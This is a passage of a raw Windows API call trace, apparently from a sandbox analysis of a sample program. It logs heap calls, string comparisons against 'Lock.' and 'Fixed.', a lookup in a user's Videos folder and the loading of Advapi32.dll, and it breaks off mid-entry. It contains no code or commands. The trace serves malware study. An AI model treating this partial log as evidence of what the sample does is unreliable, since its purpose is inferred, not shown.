(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0257.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0257.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0257.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5WsMFJk0dr95l c", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WsMFJk0dr95l c", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sMFJk0dr95l c", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MFJk0dr95l c", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FJk0dr95l c", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jk0dr95l c", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k0dr95l c", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0dr95l c", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dr95l c", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r95l c", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0257.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="95l c", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0257.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0257.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0257.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0257.192] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0257.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0257.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0257.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0257.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0257.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5WsMFJk0dr95l c", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WsMFJk0dr95l c", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sMFJk0dr95l c", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MFJk0dr95l c", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FJk0dr95l c", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jk0dr95l c", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k0dr95l c", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0dr95l c", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dr95l c", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0257.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r95l c", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0257.193] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0257.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0257.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0257.193] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0257.193] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0257.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0257.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8e0 [0257.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0257.193] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0257.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0257.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0257.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa958 [0257.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0257.194] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0257.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0257.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0257.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.194] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0257.194] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.194] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0257.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.194] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0257.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.194] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.195] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.195] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/5WsMFJk0dr95l c", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fefd280, ftCreationTime.dwHighDateTime=0x1d4c9cd, ftLastAccessTime.dwLowDateTime=0x5136ea10, ftLastAccessTime.dwHighDateTime=0x1d4c53c, ftLastWriteTime.dwLowDateTime=0x5136ea10, ftLastWriteTime.dwHighDateTime=0x1d4c53c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x290530, dwReserved1=0xfbb0, cFileName="5WsMFJk0dr95l c", cAlternateFileName="5WSMFJ~1")) returned 0xaa5820 [0257.195] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0257.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.196] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0257.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0257.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0257.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.208] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.208] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0257.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa940 [0257.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0257.209] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0257.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.209] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0257.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.210] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.210] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.210] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa988 [0257.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.211] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.211] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0257.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.212] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0257.212] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0257.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0257.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.214] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0257.214] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0257.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0257.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0257.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0257.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0257.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0257.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0257.216] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0257.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: 